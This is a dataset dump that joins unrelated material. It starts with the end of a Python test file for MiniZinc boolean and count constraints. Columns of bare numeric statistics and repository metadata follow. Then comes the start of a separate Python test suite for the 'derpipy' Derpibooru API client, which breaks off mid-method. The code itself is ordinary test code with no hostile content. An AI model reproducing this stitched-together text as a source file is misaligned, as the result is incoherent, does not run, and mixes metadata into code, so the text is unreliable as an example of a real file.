check("tests/mzn/bool_le_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a <= b) or (not r))], optstr=2)
check("tests/mzn/bool_lt_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a < b)])
check("tests/mzn/bool_lt_reif_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a < b) or (not r and not (a < b)))])
check("tests/mzn/bool_lt_imp_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a < b) or (not r))], optstr=2)
# see https://github.com/MiniZinc/libminizinc/issues/477
# bool_lin_eq
check("tests/mzn/bool_lin_eq_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") + [f"c={c}"] for a1,a2,a3,a4,c in itertools.product(BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c])
# currently only works with -O0 by accident
check("tests/mzn/bool_lin_eq_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") + [f"c={c}"] for a1,a2,a3,a4,r,c in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c) or (not r and not ((a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c))])
# see https://github.com/MiniZinc/libminizinc/issues/480
#check("tests/mzn/bool_lin_eq_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") + [f"c={c}"] for a1,a2,a3,a4,r,c in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL, range(-10,13)) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == c) or (not r)])
# bool_lin_le
check("tests/mzn/bool_lin_le_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10])
check("tests/mzn/bool_lin_le_reif_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") for a1,a2,a3,a4,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10) or (not r and not ((a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10))])
# see https://github.com/MiniZinc/libminizinc/issues/480
# check("tests/mzn/bool_lin_le_imp_1.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4",r,"r") for a1,a2,a3,a4,r in itertools.product(BOOL, BOOL, BOOL, BOOL, BOOL) if (r and (a1*3) + (a2*-2) + (a3*-5) + (a4*8) <= 10) or (not r)])
# TODO: check if pb constraint is created
check("tests/mzn/bool_lin_eq_2.mzn", [toBool(a1,"a1",a2,"a2",a3,"a3",a4,"a4") for a1,a2,a3,a4 in itertools.product(BOOL, BOOL, BOOL, BOOL) if (a1*3) + (a2*-2) + (a3*-5) + (a4*8) == 10])
check("tests/mzn/bool_not_1.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a != b)])
check("tests/mzn/bool_or_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a or b) or (not r and not (a or b)))])
check("tests/mzn/bool_xor_1.mzn", [toBool(a,"a",b,"b",r,"r") for a,b,r in itertools.product(BOOL, BOOL, BOOL) if (r and (a ^ b) or (not r and not (a ^ b)))])
check("tests/mzn/bool_xor_2.mzn", [toBool(a,"a",b,"b") for a,b in itertools.product(BOOL, BOOL) if (a ^ b)])
### 2.0.0
#array_int_max/minimum already in std builtins
#array_bool_clause_reif already in std builtins
### redefined globals
check("tests/mzn/count_eq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)==2 ])
check("tests/mzn/count_geq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)<=2 ])
check("tests/mzn/count_gt_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)<2 ])
check("tests/mzn/count_leq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)>=2 ])
check("tests/mzn/count_lt_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)>2 ])
check("tests/mzn/count_neq_par_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] for a,b,c in itertools.product(range(-3,10), range(-5,6), range(0,9)) if [a,b,c].count(7)!=2 ])
check("tests/mzn/count_eq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)==2) or (not r and not ([a,b,c].count(7)==2)) ])
check("tests/mzn/count_geq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<=2) or (not r and not ([a,b,c].count(7)<=2)) ])
check("tests/mzn/count_gt_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<2) or (not r and not ([a,b,c].count(7)<2)) ])
check("tests/mzn/count_leq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>=2) or (not r and not ([a,b,c].count(7)>=2)) ])
check("tests/mzn/count_lt_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>2) or (not r and not ([a,b,c].count(7)>2)) ])
check("tests/mzn/count_neq_par_reif_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)!=2) or (not r and not ([a,b,c].count(7)!=2)) ])
check("tests/mzn/count_eq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)==2) or (not r) ])
check("tests/mzn/count_geq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<=2) or (not r) ])
check("tests/mzn/count_gt_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)<2) or (not r) ])
check("tests/mzn/count_leq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>=2) or (not r) ])
check("tests/mzn/count_lt_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)>2) or (not r) ])
check("tests/mzn/count_neq_par_imp_1.mzn", [[f"a={a}", f"b={b}", f"c={c}"] + toBool(r,"r") for a,b,c,r in itertools.product(range(-3,10), range(-5,6), range(0,9), BOOL) if (r and [a,b,c].count(7)!=2) or (not r) ])
| 124.473684
| 423
| 0.585994
| 4,212
| 18,920
| 2.565052
| 0.037987
| 0.029989
| 0.10709
| 0.129859
| 0.925768
| 0.88967
| 0.8607
| 0.844872
| 0.827842
| 0.79813
| 0
| 0.064317
| 0.136311
| 18,920
| 151
| 424
| 125.298013
| 0.596842
| 0.103806
| 0
| 0
| 0
| 0
| 0.207747
| 0.142164
| 0
| 0
| 0
| 0.006623
| 0
| 1
| 0.030612
| false
| 0
| 0.040816
| 0
| 0.081633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
74cb7639acb4a2b91c13a9af4f41098a2e3fc78b
| 87,658
|
py
|
Python
|
tests/sync/test.py
|
luckydonald/derpipy
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | null | null | null |
tests/sync/test.py
|
luckydonald/derpipy
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | 1
|
2020-07-27T00:39:46.000Z
|
2020-07-27T02:27:42.000Z
|
tests/sync/test.py
|
derpipy/derpi
|
3220ca13605f97bb5422cfb2975c54028f42f880
|
[
"MIT"
] | 1
|
2020-03-21T14:40:10.000Z
|
2020-03-21T14:40:10.000Z
|
import unittest
import iso8601
import datetime
from derpi.syncrounous import (
client, Comment, Image, Intensities, Representations, DerpiModel, Tag, Post, User, Filter,
Oembed, Links, Awards, Gallery, Forum, Topic,
)
null = None # jSoN
false = False # JsOn
true = True # JsoN
DerpiModel._assert_consuming_all_params = True
def cloudflare_blocked_request(
cls, method, url, params=None, client=None,
):
from derpi.syncrounous.client import internet
response: internet.Response = internet.request(
method=method, url=url, params=params,
cookies={},
headers={
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',
},
)
cls._check_response(response)
return response
# end def
# end def
client.DerpiClient.request = classmethod(cloudflare_blocked_request)
class OnlineTest(unittest.TestCase):
def test_comment(self):
comment = client.comment(8927783)
self.assertIsInstance(comment, Comment)
# end def
def test_image(self):
image = client.image(1322277)
self.assertIsInstance(image, Image)
# end def
def test_featured_image(self):
featured_image = client.featured_image()
self.assertIsInstance(featured_image, Image)
# end def
def test_tag(self):
tag = client.tag('oc-colon-littlepip')
self.assertIsInstance(tag, Tag)
# end def
def test_tag__aliased(self):
tag = client.tag('littlepip')
self.assertIsInstance(tag, Tag)
# end def
def test_tag__with_spoiler(self):
tag = client.tag('-colon-<')
self.assertIsInstance(tag, Tag)
self.assertIsNotNone(tag.spoiler_image_uri)
# end def
def test_post(self):
post = client.post(4704912)
self.assertIsInstance(post, Post)
# end def
def test_user(self):
user = client.user(264159)
self.assertIsInstance(user, User)
# end def
def test_filter(self):
filter = client.filter(179331)
self.assertIsInstance(filter, Filter)
# end def
def test_system_filters(self):
system_filters = client.system_filters(0)
self.assertIsInstance(system_filters, list)
for filter in system_filters:
self.assertIsInstance(filter, Filter)
# end for
# end def
def test_user_filters__with_key(self):
try:
from somewhere import API_KEY
except ImportError:
self.skipTest('no test without API key')
# end try
user_filters = client.user_filters(0, key=API_KEY)
self.assertIsInstance(user_filters, list)
for filter in user_filters:
self.assertIsInstance(filter, Filter)
# end for
# end def
def test_oembed(self):
oembed = client.oembed('https://derpibooru.org/images/2301208?q=oc%3Alittlepip')
self.assertIsInstance(oembed, Oembed)
# end def
def _contains_best_pony(self, text):
text = text.lower()
if 'best' not in text:
return False
if not any([
stem in text
for stem in ['pony', 'ponies']
]):
return False
# end if
return True
# end def
def test_search_comments(self):
search_comments = client.search_comments('best pony')
self.assertIsInstance(search_comments, list)
for comment in search_comments:
self.assertIsInstance(comment, Comment)
self.assertTrue(self._contains_best_pony(comment.body), f'should contain "best pony" or similar in comment body: {comment.body!r}')
# end for
# end def
def test_search_galleries(self):
search_galleries = client.search_galleries('best pony')
self.assertIsInstance(search_galleries, list)
for gallery in search_galleries:
self.assertIsInstance(gallery, Gallery)
self.assertTrue(self._contains_best_pony(gallery.title) or self._contains_best_pony(gallery.description), f'should contain "best pony" or similar in gallery title or description: {gallery.title!r} and {gallery.description}')
# end for
# end def
def test_search_posts(self):
search_posts = client.search_posts('best pony')
self.assertIsInstance(search_posts, list)
for post in search_posts:
self.assertIsInstance(post, Post)
self.assertTrue(self._contains_best_pony(post.body), f'should contain "best pony" or similar in post body: {post.body!r}')
# end for
# end def
def test_search_images(self):
items = 2
search_images = client.search_images(query='littlepip', per_page=items)
self.assertIsInstance(search_images, list)
self.assertEquals(len(search_images), items)
for image in search_images:
self.assertIsInstance(image, Image)
self.assertIn('oc:littlepip', image.tags)
# end for
# end def
def test_search_tags(self):
search_tags = client.search_tags('littlepip', page=1)
self.assertIsInstance(search_tags, list)
self.assertTrue(search_tags)
for tag in search_tags:
self.assertIsInstance(tag, Tag)
self.assertIn('littlepip', tag.name)
# end for
# end def
def test_search_reverse(self):
search_reverse = client.search_reverse(url='https://derpicdn.net/img/view/2016/2/3/1079240.png')
self.assertIsInstance(search_reverse, list)
self.assertTrue(search_reverse)
self.assertEqual(len(search_reverse), 1, 'should have exactly 1 result')
self.assertIsInstance(search_reverse[0], Image)
self.assertEqual(search_reverse[0].id, 1079240)
# end def
def test_forums(self):
forums = client.forums()
self.assertIsInstance(forums, list)
self.assertTrue(forums)
for forum in forums:
self.assertIsInstance(forum, Forum)
# end for
# end def
def test_forum(self):
forum = client.forum('rp')
self.assertIsInstance(forum, Forum)
self.assertEqual(forum.short_name, 'rp')
self.assertTrue(forum)
# end def
def test_forum_topics(self):
forum_topics = client.forum_topics('art')
self.assertIsInstance(forum_topics, list)
self.assertTrue(forum_topics)
for forum_topic in forum_topics:
self.assertIsInstance(forum_topic, Topic)
# end for
# end def
def test_forum_topic(self):
forum_topic = client.forum_topic('art', 'featured-image')
self.assertIsInstance(forum_topic, Topic)
self.assertEqual(forum_topic.slug, 'featured-image')
self.assertTrue(forum_topic)
# end def
def test_forum_posts(self):
forum_posts = client.forum_posts('generals', 'time-wasting-thread-30-sfw-no-explicitgrimdark', page=4458)
self.assertIsInstance(forum_posts, list)
self.assertTrue(forum_posts)
for forum_post in forum_posts:
self.assertIsInstance(forum_post, Post)
# end for
# end def
def test_forum_post(self):
forum_post = client.forum_post('art', 'featured-image', 4758123)
self.assertIsInstance(forum_post, Post)
self.assertEqual(forum_post.id, 4758123)
self.assertTrue(forum_post)
# end def
# end class
class OfflineTest(unittest.TestCase):
def test_image(self):
image = Image.from_dict({
"image": {
"mime_type": "image/png",
"tag_ids": [24249, 26029, 27084, 28087, 29252, 33855, 36710, 38185, 40482, 41554, 41769, 42627, 43713, 44356, 45218, 47596, 48683, 49989, 54099, 60900, 70995, 75881, 82531, 83246, 98475, 109992, 129556, 140006, 141241, 169378, 173557, 178114, 186417, 187857, 191172, 210505, 234813, 243362, 355725, 373735, 377490, 407683],
"comment_count": 63,
"score": 1103,
"downvotes": 11,
"thumbnails_generated": true,
"wilson_score": 0.9792839499360272,
"source_url": "https://twitter.com/KamDrawings/status/1123822106784010240",
"aspect_ratio": 1.7454090150250416,
"sha512_hash": "ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f",
"orig_sha512_hash": "ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f",
"first_seen_at": "2019-05-02T05:33:36",
"height": 1198,
"intensities": {
"ne": 43.666426229379056,
"nw": 55.8670966658656,
"se": 29.931677346829446,
"sw": 43.073299224516546
},
"hidden_from_users": false,
"name": "cacaw.png",
"spoilered": false,
"description": "bird.",
"uploader": "Kam3E433",
"tag_count": 42,
"processed": true,
"duration": 0.04,
"representations": {
"full": "https://derpicdn.net/img/view/2019/5/2/2028858.png",
"large": "https://derpicdn.net/img/2019/5/2/2028858/large.png",
"medium": "https://derpicdn.net/img/2019/5/2/2028858/medium.png",
"small": "https://derpicdn.net/img/2019/5/2/2028858/small.png",
"tall": "https://derpicdn.net/img/2019/5/2/2028858/tall.png",
"thumb": "https://derpicdn.net/img/2019/5/2/2028858/thumb.png",
"thumb_small": "https://derpicdn.net/img/2019/5/2/2028858/thumb_small.png",
"thumb_tiny": "https://derpicdn.net/img/2019/5/2/2028858/thumb_tiny.png"
},
"width": 2091,
"id": 2028858,
"deletion_reason": null,
"view_url": "https://derpicdn.net/img/view/2019/5/2/2028858__safe_artist-colon-kam_gallus_sandbar_earth+pony_griffon_pony_airhorn_alarmed_behaving+like+a+bird_birb_birds+doing+bird+things_blue+background_blue+eye.png",
"created_at": "2019-05-02T05:33:36",
"updated_at": "2020-04-10T00:14:35",
"faves": 813,
"size": 1810951,
"animated": false,
"upvotes": 1114,
"format": "png",
"duplicate_of": null,
"uploader_id": 459261,
"tags": ["cute", "earth pony", "feather", "frown", "griffon", "male", "open mouth", "pony", "safe", "shocked", "simple background", "speech", "surprised", "text", "this will end in tears", "wings", "solo focus", "this will end in pain", "mismatched eyes", "caw", "airhorn", "alarmed", "featured image", "exclamation point", "wide eyes", "gradient background", "catbird", "behaving like a bird", "birb", "blue eyes", "blue background", "griffons doing bird things", "offscreen character", "spread wings", "hoof hold", "quadrupedal", "gallus", "this will end in deafness", "sandbar", "gallabetes", "birds doing bird things", "artist:kam"]
},
"interactions": []
}['image'])
expected = Image(aspect_ratio=1.7454090150250416, comment_count=63, created_at=datetime.datetime(2019, 5, 2, 5, 33, 36, tzinfo=datetime.timezone.utc), deletion_reason=None, description='bird.', downvotes=11, duplicate_of=None, faves=813, first_seen_at=datetime.datetime(2019, 5, 2, 5, 33, 36, tzinfo=datetime.timezone.utc), format='png', height=1198, hidden_from_users=False, id=2028858, intensities=Intensities(ne=43.666426229379056, nw=55.8670966658656, se=29.931677346829446, sw=43.073299224516546), mime_type='image/png', name='cacaw.png', orig_sha512_hash='ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f', processed=True, representations=Representations(full='https://derpicdn.net/img/view/2019/5/2/2028858.png', large='https://derpicdn.net/img/2019/5/2/2028858/large.png', medium='https://derpicdn.net/img/2019/5/2/2028858/medium.png', small='https://derpicdn.net/img/2019/5/2/2028858/small.png', tall='https://derpicdn.net/img/2019/5/2/2028858/tall.png', thumb='https://derpicdn.net/img/2019/5/2/2028858/thumb.png', thumb_small='https://derpicdn.net/img/2019/5/2/2028858/thumb_small.png', thumb_tiny='https://derpicdn.net/img/2019/5/2/2028858/thumb_tiny.png'), score=1103, sha512_hash='ef377b5ce9b6abb39701bded38d9588e8ee6c28a6bc384d764237a9800356860484351be1f992c2c76a6db9425eb5171d260fde351c92e0615c4af7a3024156f', source_url='https://twitter.com/KamDrawings/status/1123822106784010240', spoilered=False, tag_count=42, tag_ids=[24249, 26029, 27084, 28087, 29252, 33855, 36710, 38185, 40482, 41554, 41769, 42627, 43713, 44356, 45218, 47596, 48683, 49989, 54099, 60900, 70995, 75881, 82531, 83246, 98475, 109992, 129556, 140006, 141241, 169378, 173557, 178114, 186417, 187857, 191172, 210505, 234813, 243362, 355725, 373735, 377490, 407683], tags=['cute', 'earth pony', 'feather', 'frown', 'griffon', 'male', 'open mouth', 'pony', 'safe', 'shocked', 'simple background', 'speech', 'surprised', 'text', 'this will end in tears', 'wings', 'solo focus', 'this will end in pain', 'mismatched eyes', 'caw', 'airhorn', 'alarmed', 'featured image', 'exclamation point', 'wide eyes', 'gradient background', 'catbird', 'behaving like a bird', 'birb', 'blue eyes', 'blue background', 'griffons doing bird things', 'offscreen character', 'spread wings', 'hoof hold', 'quadrupedal', 'gallus', 'this will end in deafness', 'sandbar', 'gallabetes', 'birds doing bird things', 'artist:kam'], thumbnails_generated=True, updated_at=datetime.datetime(2020, 4, 10, 0, 14, 35, tzinfo=datetime.timezone.utc), uploader='Kam3E433', uploader_id=459261, upvotes=1114, view_url='https://derpicdn.net/img/view/2019/5/2/2028858__safe_artist-colon-kam_gallus_sandbar_earth+pony_griffon_pony_airhorn_alarmed_behaving+like+a+bird_birb_birds+doing+bird+things_blue+background_blue+eye.png', width=2091, wilson_score=0.9792839499360272, size=1810951, animated=False, duration=0.04)
self.assertEqual(image, expected)
# end def
def test_tag(self):
tag = Tag.from_dict({
"tag": {
"aliased_tag": null,
"aliases": [
"littlepip"
],
"category": "oc",
"description": "Creator: Kkat\r\nSpecies: Unicorn Female\r\nMain protagonist of the \"Fallout: Equestria series\":http://www.fimfiction.net/story/119190/fallout-equestria (NSFW)\r\n>>610341s",
"dnp_entries": [],
"id": 113046,
"images": 3663,
"implied_by_tags": [
"futa+oc-colon-littlepip",
"busty+littlepip",
"pipabetes",
"pipbutt"
],
"implied_tags": [
"fallout+equestria",
"oc"
],
"name": "oc:littlepip",
"name_in_namespace": "littlepip",
"namespace": "oc",
"short_description": "",
"slug": "oc-colon-littlepip",
"spoiler_image_uri": null
}
}['tag'])
expected = Tag(aliased_tag=None, aliases=['littlepip'], category='oc', description='Creator: Kkat\r\nSpecies: Unicorn Female\r\nMain protagonist of the "Fallout: Equestria series":http://www.fimfiction.net/story/119190/fallout-equestria (NSFW)\r\n>>610341s', dnp_entries=[], id=113046, images=3663, implied_by_tags=['futa+oc-colon-littlepip', 'busty+littlepip', 'pipabetes', 'pipbutt'], implied_tags=['fallout+equestria', 'oc'], name='oc:littlepip', name_in_namespace='littlepip', namespace='oc', short_description='', slug='oc-colon-littlepip', spoiler_image_uri=None)
self.assertEqual(tag, expected)
# end def
def test_tag__aliased(self):
tag = Tag.from_dict({
"tag": {
"aliased_tag": "oc-colon-littlepip",
"aliases": [],
"category": null,
"description": "",
"dnp_entries": [],
"id": 33169,
"images": 0,
"implied_by_tags": [],
"implied_tags": [],
"name": "littlepip",
"name_in_namespace": "littlepip",
"namespace": null,
"short_description": "",
"slug": "littlepip",
"spoiler_image_uri": null
}
}['tag'])
expected = Tag(aliased_tag='oc-colon-littlepip', aliases=[], category=None, description='', dnp_entries=[], id=33169, images=0, implied_by_tags=[], implied_tags=[], name='littlepip', name_in_namespace='littlepip', namespace=None, short_description='', slug='littlepip', spoiler_image_uri=None)
self.assertEqual(tag, expected)
def test_post(self):
post = Post.from_dict({
"post": {
"author": "Joey",
"avatar": "https://derpicdn.net/avatars/2019/11/13/14215782720827205181237247282992609700.png",
"body": "This notice is primarily targeted towards developers, but may affect anyone using third party applications to update the site:\r\n\r\n*If you do not know what an API is and you only browse Derpibooru in a web browser, than this post does not affect you, and you can ignore this announcement.*\r\n\r\nIn December, Derpibooru completed the migration to \"Philomena\":https://github.com/derpibooru/philomena - our new, rewritten from the ground-up codebase - to significantly improve performance of the site and to pave the way for future enhancements.\r\n\r\nAs part of this migration, Philomena implements a new API that allows more capabilities than our previous API. You can read a bit about that \"here\":/forums/meta/topics/philomena-open-beta-breaking-api-changes\r\n\r\nThe old API has remained available since the migration to ensure compatibility with older apps and to allow third party developers time to migrate to the new API. Regrettably, maintaining compatibility with the old API is causing some limits with regards to changes we'd like to make to the site's code. As such, our development team has made the decision to begin deprecating and shutting down the old API.\r\n\r\nCurrently the old API is scheduled to be decommissioned on *March 31st, 2020*.\r\n\r\nIf you write third party apps or scripts that interact with Derpibooru, we encourage you to make sure that your application is compatible with the new API by then. You can read documentation on the current API \"here\":/pages/api\r\n\r\nIf you use an app or script that interacts with the site, and it has not been updated since December, then it is likely it's utilizing the old API still, and you should reach out to the developer to ensure that it's updated so compatibility is maintained.",
"created_at": "2020-02-20T16:18:04",
"edit_reason": null,
"edited_at": "2020-02-21T05:42:40Z",
"id": 4704912,
"updated_at": "2020-02-21T05:42:40",
"user_id": 216494
}
}['post'])
expected = Post(author='Joey', body='This notice is primarily targeted towards developers, but may affect anyone using third party applications to update the site:\r\n\r\n*If you do not know what an API is and you only browse Derpibooru in a web browser, than this post does not affect you, and you can ignore this announcement.*\r\n\r\nIn December, Derpibooru completed the migration to "Philomena":https://github.com/derpibooru/philomena - our new, rewritten from the ground-up codebase - to significantly improve performance of the site and to pave the way for future enhancements.\r\n\r\nAs part of this migration, Philomena implements a new API that allows more capabilities than our previous API. You can read a bit about that "here":/forums/meta/topics/philomena-open-beta-breaking-api-changes\r\n\r\nThe old API has remained available since the migration to ensure compatibility with older apps and to allow third party developers time to migrate to the new API. Regrettably, maintaining compatibility with the old API is causing some limits with regards to changes we\'d like to make to the site\'s code. As such, our development team has made the decision to begin deprecating and shutting down the old API.\r\n\r\nCurrently the old API is scheduled to be decommissioned on *March 31st, 2020*.\r\n\r\nIf you write third party apps or scripts that interact with Derpibooru, we encourage you to make sure that your application is compatible with the new API by then. You can read documentation on the current API "here":/pages/api\r\n\r\nIf you use an app or script that interacts with the site, and it has not been updated since December, then it is likely it\'s utilizing the old API still, and you should reach out to the developer to ensure that it\'s updated so compatibility is maintained.', id=4704912, user_id=216494, avatar='https://derpicdn.net/avatars/2019/11/13/14215782720827205181237247282992609700.png', created_at=datetime.datetime(2020, 2, 20, 16, 18, 4, tzinfo=datetime.timezone.utc), edit_reason=None, edited_at=datetime.datetime(2020, 2, 21, 5, 42, 40, tzinfo=datetime.timezone.utc), updated_at=datetime.datetime(2020, 2, 21, 5, 42, 40, tzinfo=datetime.timezone.utc))
self.assertEqual(post, expected)
# end def
def test_user(self):
user = User.from_dict({
"user": {
"avatar_url": "https://derpicdn.net/avatars/2013/5/2/6960000e0c80e94df370222.png",
"awards": [
{
"awarded_on": "2018-05-02T20:35:09Z",
"id": 27,
"image_url": "https://derpicdn.net/media/2016/8/23/540676fb2fd6546ee45a1c1.svg",
"label": null,
"title": "Artist"
}
],
"comments_count": 10,
"created_at": "2013-05-02T16:07:03",
"description": null,
"id": 264159,
"links": [
{
"created_at": "2018-05-02T20:42:44",
"state": "verified",
"tag_id": 53157,
"user_id": 264159
},
{
"created_at": "2018-05-02T20:33:00",
"state": "verified",
"tag_id": 53157,
"user_id": 264159
}
],
"name": "luckydonald",
"posts_count": 3,
"role": "user",
"slug": "luckydonald",
"topics_count": 0,
"uploads_count": 12
}
}['user'])
expected = User(id=264159, name='luckydonald', slug='luckydonald', role='user', description=None, avatar_url='https://derpicdn.net/avatars/2013/5/2/6960000e0c80e94df370222.png', created_at=datetime.datetime(2013, 5, 2, 16, 7, 3, tzinfo=datetime.timezone.utc), comments_count=10, uploads_count=12, posts_count=3, topics_count=0, links=[Links.from_dict({'created_at': '2018-05-02T20:42:44', 'state': 'verified', 'tag_id': 53157, 'user_id': 264159}), Links.from_dict({'created_at': '2018-05-02T20:33:00', 'state': 'verified', 'tag_id': 53157, 'user_id': 264159})], awards=[Awards.from_dict({'awarded_on': '2018-05-02T20:35:09Z', 'id': 27, 'image_url': 'https://derpicdn.net/media/2016/8/23/540676fb2fd6546ee45a1c1.svg', 'label': None, 'title': 'Artist'})])
self.assertEqual(user, expected)
# end def
def test_filter(self):
filter = Filter.from_dict({
"filter": {
"description": "Displays only images of Waifu horse.\r\n\r\nID: 179331",
"hidden_complex": "score.lte:100\r\n-littlepip",
"hidden_tag_ids": [115234, 26911],
"id": 179331,
"name": "Best Pony",
"public": true,
"spoilered_complex": null,
"spoilered_tag_ids": [26707],
"system": false,
"user_count": 0,
"user_id": 264159
}
}['filter'])
expected = Filter(id=179331, name='Best Pony', description='Displays only images of Waifu horse.\r\n\r\nID: 179331', user_id=264159, user_count=0, system=False, public=True, spoilered_tag_ids=[26707], spoilered_complex=None, hidden_tag_ids=[115234, 26911], hidden_complex='score.lte:100\r\n-littlepip')
self.assertEqual(filter, expected)
# end def
def test_oembed(self):
oembed = Oembed.from_dict({'author_name': 'ramiras', 'author_url': 'https://vk.com/feed?w=wall-80761589_14016', 'cache_age': 7200, 'derpibooru_comments': 3, 'derpibooru_id': 2301208, 'derpibooru_score': 254, 'derpibooru_tags': ['book cover', 'clothes', 'cover', 'fallout equestria', 'fanfic', 'fanfic art', 'female', 'gun', 'hooves', 'horn', 'little macintosh', 'mare', 'oc', 'pipbuck', 'pony', 'revolver', 'ruins', 'safe', 'solo', 'spritebot', 'sweet apple acres', 'tree', 'unicorn', 'weapon', 'canterlot castle', 'handgun', 'vault suit', 'oc only', 'oc:littlepip', 'dead tree', 'artist:ramiras', 'oc:watcher', 'optical sight'], 'provider_name': 'Derpibooru', 'provider_url': 'https://derpibooru.org', 'title': '#2301208 - safe, artist:ramiras, oc, oc only, oc:littlepip, oc:watcher, pony, unicorn, fallout equestria, book cover, canterlot castle, clothes, cover, dead tree, fanfic, fanfic art, female, gun, handgun, hooves, horn, little macintosh, mare, optical sight, pipbuck, revolver, ruins, solo, spritebot, sweet apple acres, tree, vault suit, weapon - Derpibooru', 'type': 'photo', 'version': '1.0'})
